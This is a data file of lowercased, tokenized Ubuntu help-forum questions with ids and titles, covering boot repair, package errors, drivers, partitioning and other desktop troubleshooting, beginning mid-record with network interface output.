mask:255.255.255.0 inet6 addr : fe80 : :20d:61ff : fe31 : d838/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:419 errors:0 dropped:65 overruns:0 frame:0 tx packets:259 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:31975 ( 31.9 kb ) tx bytes:21581 ( 21.5 kb ) $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.0.53.254 0.0.0.0 ug 0 0 0 eth0 10.0.53.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 $ ping -c 4 10.0.53.254 ping 10.0.53.254 ( 10.0.53.254 ) 56 ( 84 ) bytes of data . -- - 10.0.53.254 ping statistics -- - 4 packets transmitted , 0 received , 100 % packet loss , time 2999ms
247141	how to restore boot from hdd when boot-repair fails ?	i ca n't boot to anything on my hdd , neither windows nor ubuntu . i can , however , run ubuntu from a livecd . i tried using boot-repair but it cant repair anything , it just gives me this output : please write on a paper the following url : http : //paste.ubuntu.com/1566804/ in case you still experience boot problem , indicate this url to : boot.repair @ gmail.com or to your favorite support forum . no change has been performed on your computer . see you soon ! how can i fix this so i can boot to my hdd partitions again ?
247142	how to install ubuntu fonts in thunderbird	while search across various fonts , i liked ubuntu font and would like to set it up as default font for my thunderbird mail client . from ubuntu size it allows me to download the zip file , however , not sure how to install it in thunderbird .
247145	brightness controls are not working in sony vaio with amd radeon hd 7650	i have a sony vaio sve15116en with amd radeon hd 7650 graphics card . i am currently using ubuntu 12.10 . my brightness controls are not working but sound controls are working fine . i have also tried proprietary drivers also but no luck . i have tried controlling brightness with terminal but it also did not work . please can anyone tell me what can i do ? i have been searching for the solution almost for a week . any ideas ?
247153	/grub/i386-pc/normal.mod error	i just installed ubuntu on my computer . it installed fine , but on the reboot it says : error : file /grub/i386-pc/normal.mod i do n't understand . i have tried many things i have found on these sites to try and fix it but it normally comes up with unknown command . for example i type in sudo grub-install /dev/sda and it says unknown command : sudo . i really would like to figure this out please help me !
247157	how to restore basic icon sets ( inherited by all the others ) in lubuntu 12.10 ?	i have searched and installed a lot of icon sets , but after a while i was surprised to see how big these packages were and decided to return to the basic set `` lubuntu box '' . but i have tried to delete all the big packages that i considered useless from usr/share/icons and from ~/.icons . and something went wrong : a lot of applications are without icon now , like the network tray icon , deadbeef , and many others i have reinstalled lubuntu-artwork-12-10 without result . for some reason `` malys-uniblu '' is the icon set that still covers a lot of apps that other icon sets do not . some of the icons that i have now installed : trying to install elementary and gnome back , i got error more details on error report : ( reading database ... 347458 files and directories currently installed . ) preparing to replace elementary-icon-theme 2.7.1-0ubuntu6 ( using ... /elementary-icon-theme_2.7.1-0ubuntu6_all.deb ) ... unpacking replacement elementary-icon-theme ... gtk-update-icon-cache-3.0 : the generated cache was invalid . warning : icon cache generation failed for /usr/share/icons/elementary selecting previously unselected package human-icon-theme . unpacking human-icon-theme ( from ... /human-icon-theme_0.36_all.deb ) ... selecting previously unselected package breathe-icon-theme . unpacking breathe-icon-theme ( from ... /breathe-icon-theme_0.51.2_all.deb ) ... selecting previously unselected package gnome-colors-common . unpacking gnome-colors-common ( from ... /gnome-colors-common_5.5.1-1ubuntu1_all.deb ) ... selecting previously unselected package gnome-brave-icon-theme . unpacking gnome-brave-icon-theme ( from ... /gnome-brave-icon-theme_5.5.1-1ubuntu1_all.deb ) ... preparing to replace lubuntu-elementary-icon-theme 0.34 ( using ... /lubuntu-elementary-icon-theme_0.34_all.deb ) ... unpacking replacement lubuntu-elementary-icon-theme ... setting up elementary-icon-theme ( 2.7.1-0ubuntu6 ) ... gtk-update-icon-cache-3.0 : the generated cache was invalid . warning : icon cache generation failed for /usr/share/icons/elementary setting up human-icon-theme ( 0.36 ) ... setting up breathe-icon-theme ( 0.51.2 ) ... setting up gnome-colors-common ( 5.5.1-1ubuntu1 ) ... update-alternatives : warning : alternative /usr/share/icons/gnome/scalable/places/debian-swirl.svg ( part of link group start-here.svg ) does n't exist ; removing from list of alternatives update-alternatives : warning : alternative /usr/share/icons/gnome/scalable/places/gnome-foot.svg ( part of link group start-here.svg ) does n't exist ; removing from list of alternatives update-alternatives : warning : alternative /usr/share/icons/gnome/scalable/places/ubuntu-logo.svg ( part of link group start-here.svg ) does n't exist ; removing from list of alternatives update-alternatives : warning : /etc/alternatives/start-here.svg is dangling ; it will be updated with best choice update-alternatives : using /usr/share/icons/gnome-colors-common/scalable/places/gnome-colors.svg to provide /usr/share/icons/gnome/scalable/places/start-here.svg ( start-here.svg ) in auto mode update-alternatives : error : error creating symbolic link `/usr/share/icons/gnome/scalable/places/start-here.svg.dpkg-tmp ' : no such file or directory dpkg : error processing gnome-colors-common ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gnome-brave-icon-theme : gnome-brave-icon-theme depends on gnome-colors-common ; however : package gnome-colors-common is not configured yet . dpkg : error processing gnome-brave-icon-theme ( -- configure ) : dependency problems - leaving unconfigured setting up lubuntu-elementary-icon-theme ( 0.34 ) ... no apport report written because maxreports is reached already errors were encountered while processing : gnome-colors-common gnome-brave-icon-theme e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up gnome-colors-common ( 5.5.1-1ubuntu1 ) ... update-alternatives : warning : alternative /usr/share/icons/gnome/scalable/places/debian-swirl.svg ( part of link group start-here.svg ) does n't exist ; removing from list of alternatives update-alternatives : warning : alternative /usr/share/icons/gnome/scalable/places/gnome-foot.svg ( part of link group start-here.svg ) does n't exist ; removing from list of alternatives update-alternatives : warning : alternative /usr/share/icons/gnome/scalable/places/ubuntu-logo.svg ( part of link group start-here.svg ) does n't exist ; removing from list of alternatives update-alternatives : warning : /etc/alternatives/start-here.svg is dangling ; it will be updated with best choice update-alternatives : using /usr/share/icons/gnome-colors-common/scalable/places/gnome-colors.svg to provide /usr/share/icons/gnome/scalable/places/start-here.svg ( start-here.svg ) in auto mode update-alternatives : error : error creating symbolic link `/usr/share/icons/gnome/scalable/places/start-here.svg.dpkg-tmp ' : no such file or directory dpkg : error processing gnome-colors-common ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of gnome-brave-icon-theme : gnome-brave-icon-theme depends on gnome-colors-common ; however : package gnome-colors-common is not configured yet . dpkg : error processing gnome-brave-icon-theme ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : gnome-colors-common gnome-brave-icon-theme edit after answer advising clean your cache , then use apt-get install -f and then install hi color first : how to clear cache is not clear to me but i did some stuff found on askubuntu here ; apt-get install -f gives a lot of errors posted below ; but especially : how to install hi colors ? i mean they are already installed ; removing it first involves removing a huge number off apps ; just reinstalling in synaptic gives the errors posted above . # apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up gnome-colors-common ( 5.5.1-1ubuntu1 ) ... update-alternatives : warning : alternative /usr/share/icons/gnome/scalable/places/debian-swirl.svg ( part of link group start-here.svg ) does n't exist ; removing from list of alternatives update-alternatives : warning : alternative /usr/share/icons/gnome/scalable/places/gnome-foot.svg ( part of link group start-here.svg ) does n't exist ; removing from list of alternatives update-alternatives : warning : alternative /usr/share/icons/gnome/scalable/places/ubuntu-logo.svg ( part of link group start-here.svg ) does n't exist ; removing from list of alternatives update-alternatives : warning : /etc/alternatives/start-here.svg is dangling ; it will be updated with best choice update-alternatives : using /usr/share/icons/gnome-colors-common/scalable/places/gnome-colors.svg to provide /usr/share/icons/gnome/scalable/places/start-here.svg ( start-here.svg ) in auto mode update-alternatives : error : error creating symbolic link `/usr/share/icons/gnome/scalable/places/start-here.svg.dpkg-tmp ' : no such file or directory dpkg : error processing gnome-colors-common ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of gnome-brave-icon-theme : gnome-brave-icon-theme depends on gnome-colors-common ; however : package gnome-colors-common is not configured yet . dpkg : error processing gnome-brave-icon-theme ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already errors were encountered while processing : gnome-colors-common gnome-brave-icon-theme e : sub-process /usr/bin/dpkg returned an error code ( 1 ) could i restore my icons ?
247159	how to uninstall ( or delete ) one of 2 ubuntu 12.4 lts in my computer	i have 2 ubuntu 12.04 lts in my computer . both of them have the same name . i want to uninstall one that is in safe mode . what 's the best way to achieve the purpose ? thanks for suggestions .
247160	is there an easy way to limit user bandwidth usage ?	is there an easy way to limit user bandwidth usage to say 10kpbs ? other users should not be affected . the best i 've found is tc , but it seems way too complicated to do such a simple thing .
247161	how to make my backlit keyboard work ?	my laptop is toshiba satellite a660 . my backlit keyboard works in windows 7 with no problems , but does n't work when i 'm running ubuntu . is it possible to make my backlit keyboard work with ubuntu 12.10 ?
247166	installing ubuntu on windows mobile device	i have a motorola mc659b running windows mobile professional 6.5 on it . i 'd really like to have some variation of ubuntu running on this device . can someone point me in the right direction ?
247170	how to limit unattended-upgrades swap io usage	i have a daily spike in swap io usage at the same that unattended-upgrades runs . besides that time of day , swap io is rarely used . i recently tried to uncomment these settings : unattended-upgrade : :minimalsteps `` true '' ; acquire : :http : :dl-limit `` 70 '' ; in 50unattended-upgrades in an attempt to slow it down , but it 's still a problem . are there any other settings that will diminish its usage of swap io ? or is the only solution to upgrade only at shutdowns ? i 'm running a linode with 512mb of ram with ubuntu 12.04 .
247174	how to find reasons for journal recovery	recently , when i 've been starting my computer i 'm informed that it is recovering the journal for one of my ext3 partitions . one might expect this behaviour if the computer shutdown improperly , but , as far as i can tell this is occurring after normal shutdowns . additionally , the number of inodes which are found to be orphaned and cleared is only one or two in these cases . i have performed an fsck , but the situation continues . which logs files can i check to try to find out why this is happening ? what are some reasons it may have happened ? how can i resolve it ? update fstab is as follows : # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda5 during installation uuid=ead12a48-4a3b-4e3a-b611-d3fc62e8716a / ext4 errors=remount-ro , noatime , nodiratime 0 1 # /home was on /dev/sda6 during installation uuid=217f1c44-5d04-4c75-9d4a-2a70b1726434 /home ext3 defaults , noatime , nodiratime 0 2 update 2 cat /var/log/fsck/ { checkfs , checkroot } returns ( nothing has been logged yet . ) twice .
247175	how to create a complete backup iso to an external hard drive ?	i have seen many pages showing different ways to backup my hdd but i want to create an iso of my current hdd and move it to my external hdd all in one step . i used this code : dd if=/dev/sda of=~/disk1.img but instead it created the iso in my internal hdd not my external one . is there a way to do this ? if i type ls -l /media i get drwxr-x -- - 2 root root 4096 jan 24 17:37 apt drwxr-xr-x 3 root root 4096 jan 24 20:04 chris
247182	what is colord-sane and why does it show up on lsof internet watch ?	my friend is using 12.10 and noticed how the command `` colord-sane '' shows up on lsof every time he plugs in or unplugs a usb-stick . i tried the same thing on 12.04 ( what i use ) and colord-sane does not show up . what is colord-sane ? why is it showing up on 12.10 ? if it does n't need internet access why is it even showing up at all on the lsof watch ? how would my friend go about stopping it from trying to get on internet if it was something he wanted to stop ?
247183	what package provides the `` wl '' kernel module ?	i 've found a bug with the `` wl '' kernel module , and i 'd like to report a bug . i 'm not sure what package provides it , though .
247187	add more disk space to ubuntu from my windowns 7 major disk and shrink from other drivers	good evening everyone first i wanted to give ubuntu lts 12.04 a shot with starting with a 10 gb and left around 10 gb unused separated in all my windows disk drivers , after installing and using i realized how great things i was missing and i actually start really moving my work on it , in 2 days i am now drawing and designing using draftsight ( it was not easy to install it ) and making presentations liberoffice , so main problem now law space ( 164 mb left ) i deleted everything i donât need but i need the designing applications so ; as i know , first i must bring my live installer cd which is in my case a bootable usb and i have to shrink the space i need in windows environment and make it an other new partition , by booting from usb and going to the live version , 1 - starting g-partition or the actual ubuntu installation ? 2 - how can i merge the new partition with the old root ? 3 - is there is any useful way , better then my way ? 3 - what else i must do ? abdulkader baradi
247191	use bluetooth game controllers in kubuntu	how can i use a bluetooth gaming controller to play games in kubuntu 12.04 ? specifically , i want to play with a wii controller , but also have access to ps3 and xb360 conrollers . i installed wmgui , lswm , and wminput . they each seem to do what they are supposed to , but i just want to be able to play mednafen and kobo . kubuntu wo n't let me use it as a joystick and says something like the nintendo controller not being in /dev/ or something like that . i am fairly new to linux and do n't feel very comfortable changing system settings from the command line . yeah i can do it , but if things do n't work out i have to remember what to change back , how to change it back and what to change it back to . i have had to reinstall my linux before because of botched settings messing up system stability and i do n't want to keep making that mistake . is there a utility that would let me connect , configure and use bluetooth controller ( s ) ? i know that most people think that gaming on linux is stupid , but i feel stupid trying to play mednafen with my keyboard . an all in one program to use the three main types of conrollers on the market now ( wii , ps3 , xb360 ) would be very helpful for gamers using linux and would certainly help more people see linux gaming as a good idea . does such a program exist yet ? edit below added 1/25/2013 @ grumbel - thank you for your quick reply . your advice was very helpful . this is what i did to get the wii controller working : 1- connect bluetooth radio to computer . 2- use the package manager to find and install `` wminput '' and `` wmgui '' 3- restart for good measure ( not sure if it is necessary or not ) 4- confirm that wii remote works properly by using wmgui . 5- copy `` /etc/cwiid/wminput/buttons '' to `` /home/ [ username ] /documents '' 6- changed the copied buttons file to suit my needs ( detailed below ) 7- open a terminal 8- run `` sudo wminput -c /home/ [ username ] /documents/buttons '' 9- play kobo for a while ( tweak settings in buttons file ) 10- start mednafen 11- configure button mappings in mednafen with alt+shift+ [ number ] 12- play mednafen , have fun to stop wminput , hold the power button on the wii remote . then you can mess around with the different button settings in the config file . save the configuration and restart wminput with the same command as before . here is what is in my buttons file : ======================================================= # custom buttons plugin.led.led1 = 1 plugin.led.led4 = 1 wiimote.a = btn_left wiimote.b = btn_right wiimote.up = key_left wiimote.down = key_right wiimote.left = key_down wiimote.right = key_up wiimote.minus = key_backspace wiimote.plus = key_enter wiimote.home = key_tab wiimote.1 = key_rightshift wiimote.2 = key_rightctrl nunchuk.c = key_leftshift nunchuk.z = key_leftctrl classic.up = key_up classic.down = key_down classic.left = key_left classic.right = key_right classic.minus = key_backspace classic.plus = key_enter classic.home = key_tab classic.a = btn_left classic.b = btn_right classic.x = key_x classic.y = key_y classic.zl = btn_left classic.zr = btn_right classic.l = key_l classic.r = key_r ======================================================= i have the remote turn on led numbers one and four so i know the remote is on and connected to my computer , as opposed to connected to the wii . i am sure there are better ways to configure it , but so far this one works for me . i have not tested the nunchuck or classic controller , but i do suspect that they will work as they should . i was also thinking of using wminput like this : '' sudo wminput -d -c /home/ [ username ] /documents/buttons '' so that it will automatically connect whenever the 1 and 2 buttons are pressed on the wii remote . is there a way to issue this command automatically at startup ?
247194	how do you log in with nomodeset ?	im confused about this , i want to be able to log in to install drivers , but i do n't know how to log in . be aware that i ca n't log in normally because the log in always freezes , not even the terminal is usable . so is there any way to get into your account whilst nomodeset being active .
247199	which operating system is it ?	today i decided to install ubuntu . just one problem after clicking install alongside windows 7 . it shows me this divider thing and am not sure what each sides represents . please help . image here : http : //s1074.beta.photobucket.com/user/cylon42/media/ubuntu/screenshotfrom2013-01-24204424_zps039b9500.png.html ? sort=3 & o=0
247200	dropbox-client does not work	i just installed ubuntu 12.10 ( 64bit ) and ca n't get the dropbox-client to work . i can install it but i do n't get to the point where i should be asked for my user information ( mail adress/password ) . what i already tried : installing the package nautilus-dropbox installing the package from https : //www.dropbox.com/install download from https : //www.dropbox.com/download ? plat=lnx.x86 an run with dropbox start removing the folders .dropbox and dropbox-dist between the different approaches sometimes a window pops up , telling me that there was a 'connection error ' with dropbox and i should check my settings . i do not use a proxy . any ideas ?
247201	colour calibration hardware compatible with ubuntu 12.04 lts	i have a thinkpad w520 and it has a pantone colour calibrator.i looked it up here and in google search but as it seems the gnome colour manager ca n't use it as calibrating device at all ( maybe there is no driver at all to do so , but anyway this is not the key issue ) . so i was wondering if there is any other colour calibrating hardware ( from pantone or any other decent company ) which will be compatible with ubuntu.there is i am asking this is because i have noticed that in windows 7 where the pantone colour calibrator of my laptop works , the eye strain is not happening so often it when it happens it usually is noticeable after a 2-3 hours where in ubuntu i get it usually after 40 minutes of continuous use . if by the way there is a way to make ubuntu to use the colour of the laptop if you do not mind please explain to avoid any additional expenses from the purchase of a new colour calibration hardware .
247203	will ubuntu for phones support intel x86 based android phones ?	so is ubuntu for phones supported for intel x86 based android devices . the minimum specs seem to be cortex a9 which is arm but what about x86 ? i would love to see ubuntu on smart phones with x86 architecture .
247204	tuxguitar does n't play any sound	i have just installed tuxguitar . it runs correctly , with one exception which is quite crucial - it does n't play sounds at all . how can it be fixed ? i do n't know the model of my sound card and do n't know how to check it or install drivers all other audio players and options run ok. could there be a problem with the midi port ?
247209	will i lose unity-2d if i upgrade to 12.10	i want to continue to use unity-2d which i have setup on my 12.04 install ... but some of the new 12.10 features i would like to use . new disk utility with auto mount settings built in easier printer setup unity webapps and more new updates will i lose unity 2d when i run the upgrade ( from update manager )
247232	windows 8 and ubuntu 12.10 boot problem	i have installed ubuntu 12.10 on my computer that had windows 8 pre-installed . i used the instructions on this page : https : //help.ubuntu.com/community/uefi l after following the instructions through to the end , and having run boot repair twice , i am still unable to load windows 8 from grub . i am , however , able to load it from bios . here is the boot info : http : //paste.ubuntu.com/1567295/ any suggestions to fix this would be greatly appreciated . while loading windows from the bios is workable , it is certainly not ideal . thanks in advance .
247233	how to disable postfix logging ?	i am using ubuntu 10.04 and i am trying to disable logging for both postfix and dovecot . does anyone know how to do this ? i have found references stating that there is a setting in /etc/syslog.conf but that file does not exist on my system . please help !
247234	boot error in xubuntu	my laptop computer 's cpu does n't support pae . so i tried to install xubuntu . i use usb boot for installtion . succesful boot . i chose default ( maybe graphic mode ) . then screen cracked . ofcourse i tried to textmode installation at another linux ( backtrack5 ) i could use x windows and also start install . but it changes same when i finish the installation , reboot and start it . i tried ubuntu , xubuntu , mini ubuntu , backtrack5r3 . but all the same . cracked screen . cpu : intel pentium m 725 1.6 graphic card : nvidia geforce fx go5200 64mb ram : 1gb ddr sorry for my bad english ...
247238	half of my disk space is assigned to ubuntu . how can i move some to windows ?	i do n't need half my disk space on ubuntu and i would love to move it back to windows without having to uninstall and install ubuntu all over again . i 'd appreciate any help on this .
247241	is there any security alarm ?	i have friend that leaves an awful amount of time his laptop unattended . its is not me , it would be stupid tip for thieves to ask this publicly if it was me : p. i was thinking of an alarm that could boost the volume and fire up in case someone would unplug my friend 's computer and take it . of course it would be useless if someone would plug some headphones or remove the battery , but still this could be a `` life '' saver in case of an unfortunate event . if not , is there a terminal command to check if the battery is still plugged ? maybe an easy bash script can be made for this effect .
247245	ubuntu one synchronize folder not working	i am trying to synchronize the pidgin folder .purple in ubuntu one . however it is not synchronizing . i was able to get this to work with a previous version of ubuntu . i am currently running ubuntu 12.10 . the status of ubuntu one appears to be fine : $ u1sdtool -- status state : queue_manager connection : with user with network description : processing the commands pool is_connected : true is_error : false is_online : true dqueues : idle when selecting another folder to synchronize with ubuntu one , after first selecting to synchronize , if you right click the folder again and select the ubuntu one option it says `` stop synchronizing this folder '' . but this is not the case with the .purple folder . is there are an issue with synchronizing hidden folders ? update the strange thing is , this does n't happen on my machine at work . although it still is n't properly syncing . the ubuntu one status is the same on my machine at work $ u1sdtool -- status state : queue_manager connection : with user with network description : processing the commands pool is_connected : true is_error : false is_online : true queues : idle update 2 i have run the ubuntu control panel applet and saw that on my home machine the sync to .purple directory was not set up . so i set that up , but it seems like i can only access the files in the .purple directory in the ubuntu one service and not locally on my machine . i was expecting to be able to do things like grep the logs directory within the .purple directory but this no longer seems possible . is there something else that needs to be set up ? when you sync a directory that is located outside of the ubuntu one directory , can you only access the files on the ubuntu one website dashboard : ubuntu one service ? update 3 i can see the synced folders in the dashboard of ubuntu one service but can these folders be accessed in a terminal ?
247247	compiz-plugins schemas not found with gsettings	i have installed the extra plugins ( compiz-plugins ) for compizconfig settings manager ( compizconfig-settings-manager ) and am trying to change these settings from the command line using gsettings . the problem is none of these schemas are found by gsettings list-recursively and i ca n't understand why . based on my understanding , the schemas are found through the environment variable xdg_data_dirs which currently is this ( the default with ubuntu 12.10 ) : ben @ ben-hpdv6 : ~ $ echo $ xdg_data_dirs /usr/share/ubuntu : /usr/share/gnome : /usr/local/share/ : /usr/share/ by searching for schema files using the locate command i have found what i believe to be the missing schema files as follows : ben @ ben-hpdv6 : ~ $ locate .schemas | grep `` compiz '' /usr/share/gconf/schemas/compiz-addhelper.schemas /usr/share/gconf/schemas/compiz-animation.schemas /usr/share/gconf/schemas/compiz-annotate.schemas /usr/share/gconf/schemas/compiz-bench.schemas /usr/share/gconf/schemas/compiz-ccp.schemas /usr/share/gconf/schemas/compiz-clone.schemas /usr/share/gconf/schemas/compiz-commands.schemas /usr/share/gconf/schemas/compiz-compiztoolbox.schemas /usr/share/gconf/schemas/compiz-composite.schemas /usr/share/gconf/schemas/compiz-copytex.schemas /usr/share/gconf/schemas/compiz-crashhandler.schemas /usr/share/gconf/schemas/compiz-cube.schemas /usr/share/gconf/schemas/compiz-dbus.schemas /usr/share/gconf/schemas/compiz-decor.schemas /usr/share/gconf/schemas/compiz-expo.schemas /usr/share/gconf/schemas/compiz-extrawm.schemas /usr/share/gconf/schemas/compiz-ezoom.schemas /usr/share/gconf/schemas/compiz-fade.schemas /usr/share/gconf/schemas/compiz-fadedesktop.schemas /usr/share/gconf/schemas/compiz-firepaint.schemas /usr/share/gconf/schemas/compiz-gnomecompat.schemas /usr/share/gconf/schemas/compiz-grid.schemas /usr/share/gconf/schemas/compiz-imgjpeg.schemas /usr/share/gconf/schemas/compiz-imgpng.schemas /usr/share/gconf/schemas/compiz-imgsvg.schemas /usr/share/gconf/schemas/compiz-inotify.schemas /usr/share/gconf/schemas/compiz-kdecompat.schemas /usr/share/gconf/schemas/compiz-mag.schemas /usr/share/gconf/schemas/compiz-maximumize.schemas /usr/share/gconf/schemas/compiz-mblur.schemas /usr/share/gconf/schemas/compiz-mousepoll.schemas /usr/share/gconf/schemas/compiz-move.schemas /usr/share/gconf/schemas/compiz-neg.schemas /usr/share/gconf/schemas/compiz-notification.schemas /usr/share/gconf/schemas/compiz-obs.schemas /usr/share/gconf/schemas/compiz-opacify.schemas /usr/share/gconf/schemas/compiz-opengl.schemas /usr/share/gconf/schemas/compiz-place.schemas /usr/share/gconf/schemas/compiz-put.schemas /usr/share/gconf/schemas/compiz-regex.schemas /usr/share/gconf/schemas/compiz-resize.schemas /usr/share/gconf/schemas/compiz-resizeinfo.schemas /usr/share/gconf/schemas/compiz-ring.schemas /usr/share/gconf/schemas/compiz-rotate.schemas /usr/share/gconf/schemas/compiz-scale.schemas /usr/share/gconf/schemas/compiz-scaleaddon.schemas /usr/share/gconf/schemas/compiz-scalefilter.schemas /usr/share/gconf/schemas/compiz-screenshot.schemas /usr/share/gconf/schemas/compiz-session.schemas /usr/share/gconf/schemas/compiz-shelf.schemas /usr/share/gconf/schemas/compiz-shift.schemas /usr/share/gconf/schemas/compiz-showdesktop.schemas /usr/share/gconf/schemas/compiz-showmouse.schemas /usr/share/gconf/schemas/compiz-showrepaint.schemas /usr/share/gconf/schemas/compiz-snap.schemas /usr/share/gconf/schemas/compiz-splash.schemas /usr/share/gconf/schemas/compiz-staticswitcher.schemas /usr/share/gconf/schemas/compiz-switcher.schemas /usr/share/gconf/schemas/compiz-td.schemas /usr/share/gconf/schemas/compiz-text.schemas /usr/share/gconf/schemas/compiz-titleinfo.schemas /usr/share/gconf/schemas/compiz-trailfocus.schemas /usr/share/gconf/schemas/compiz-vpswitch.schemas /usr/share/gconf/schemas/compiz-wall.schemas /usr/share/gconf/schemas/compiz-water.schemas /usr/share/gconf/schemas/compiz-widget.schemas /usr/share/gconf/schemas/compiz-winrules.schemas /usr/share/gconf/schemas/compiz-wobbly.schemas /usr/share/gconf/schemas/compiz-workarounds.schemas /usr/share/gconf/schemas/compiz-workspacenames.schemas they are all there in /usr/share/gconf/schemas which is within /usr/share/ which is part of the default schema lookup environment variable xdg_data_dirs . so i do n't understand why they are n't appearing in gsettings ? is there a 'refresh schemas list ' command i am missing or does it not look recursively in a directory ( seems weird cause there also other schema files in this directory ) or am i not correctly understanding how gsettings works ?
247250	wubildr.mbr file error on windows 7 and windows 8 : uefi boot	0 down vote i am having 64bit windows 8 machine . i have tried a lot , installing the wubi and still it shows the wubildr.mbr file missing during boot . i installed win7 and did the same , the problem still exists ! ! ! ! my system is asus u57a notebook , 2.5ghz dual intel core i5 processor , 750hdd . bios : american megatrends inck55a.204 , 3/13/2012 ; smbios version :2.7 ; bios mode : ufei
247251	how do i change display settings like brightness , contrast , etc . on my notebook ?	i have a samsung series 9 notebook 15 '' ( model np900x3c ) and i would like to adjust the screen settings ( brightness , contrast , saturation , etc. ) . if i go to system settings â color , i see my screen listed as a device , but i have to add a profile in order to 'calibrate ' . i am clueless about how to do that . is this the right place to go ? is there another way to change the screen settings ? the graphics card is an intel hd3000 integrated one and i 'm running ubuntu 12.10
247258	how to install a lb wireless network adapter on 12.04	i purchased a bl-lw05-5r which is a wireless usb adapter how do i get the correct drivers for it to function ?
247260	does gparted do a true bit by bit partition copy	i know this is n't ubuntu specific but since it 's linux i was hoping somebody here could answer this question , since i used the 6 questions a day limit on superuser . does gparted do a true partition copy to which it copies bit by bit including empty sectors so recovery of deleted data is possible on the copy of the partition or does it just ignore and leave empty sectors .
247264	searching for md5sums of 12.04 daily build on january 19th	i downloaded and burned precise pangolin daily build on 19th january 2013 but forgot to gather the md5sum ... which was a bad idea since i 'd like to verify the file & disk now . is there an archive for daily builds md5sums ? the iso file was called precise-desktop-amd64 . thanks in advance for any help !
247265	failing installation of mysql	start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have been trying to install this for a while . i 've totally purged the system of anything mysql and tried a reinstall multiple times . i 'm at my wits end . i 'm sure i 've forgot to post something you need to troubleshoot it so please ask and i will deliver .
247266	can not increase ubuntu partition with gparted . maximum size	before i started this , i went into windows 8 and reduced it 's size to allow roughly 10gb of unallocated data . i want to increase ubuntu 12.10 's partition to fill that void . i ran ubuntu ( trial ) from my cd as told to in multiple tutorials and ran gparted . here 's my gparted screen : but , when i try to right click and `` move/resize partition '' , it does not allow me to increase the partition size any more . it 's `` max size '' is what it 's at currently . how do i make it take over the unallocated space ? sda1 = system reserved sda2 = windows 8 ext4 = ubuntu 12.10
247269	using chsh to switch to a csh shell from bash,	people keep saying you need to logout and log back in for chsh to take effect but i can not for the life of me figure out how to do this . logout does n't work ; it tells me to use exit . exit closes the terminal but when i open a new terminal nothing has changed . do i need to reboot my whole system ?
247273	easybcd removed all boot menus	i recently tried to use easybcd to edit some things and apparently ended up corrupting it some how . i 'm dual booting windows 8 and ubuntu . windows boot manager pops up , now , and says : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do n't have this disc , contact your system administrator or computer manufacturer for assistance . file : \boot\bcd status : 0xc0000098 info : the boot config data file does n't contain valid information for an operating system . i was wondering if there is any way inside the ubuntu cd to restore windows and ubuntu bootloaders .
247277	how do i enable wifi channels 12-14 when traveling outside the united states ?	for whatever reason , the united states ' fcc does n't allow wifi users to broadcast on channels 12-14 . however , i 'm sure the hardware supports it ( rtl8188ce ) . if i 'm traveling outside the united states , is there a way to enable the other wifi channels over 11 ?
247282	why wo n't ubuntu 12.10 burn to my dvd ?	i have been trying to burn the os to a dvd for two days now . it keeps failing no matter what i do , i have done everything that the instructions asked and i have tried on both a mac and a windows xp computer . does anyone have any suggestions ? i also put it on a usb stick but for some reason i cant boot from it ( trying to install on a mac mini ) thanks .
247290	grep `` something '' anyfiles.log > afile.csv , do n't need to print the input path and file name to csv file	i have some logs files , they have more than 30000 lines . i need to find the name `` domain '' and save in csv file but after saving , any lines in csv file has been added the path and file name of input files at the beginning of very line of csv file . how can i do if i do n't need the path and input file name add to csv files . example : input # cat /home/log/any.log any things..domain , anything any things..domain , anything any things..domain , anything grep `` domain '' /home/logs/any.log > newfile.csv output : # cat newfile.csv /home/logs/any.log : domain /home/logs/any.log : domain /home/logs/any.log : domain # -- -- my requirement output is : cat newfile.csv domain domain domain kind regards , please help me if anyone knowns
247291	could not display `` /media/ ... '' .the location is not a folder	i have installed ubuntu 12.10 ( 64 bit ) beside my windows 7 ( 64 bit ) via wubi.i have just increased the size of root.disk via wubi manual but when i log into ubuntu i can not mount my windows ntfs drives it says : could not display `` /media/ ... '' .the location is not a folder . even i can not do anything out of my home folder in file system drive , like copy , cut and past files ! how can i fix it without installing ubuntu again ? i do n't have live cd and i have installed ubuntu from booted usb drive . thank you in advanced .
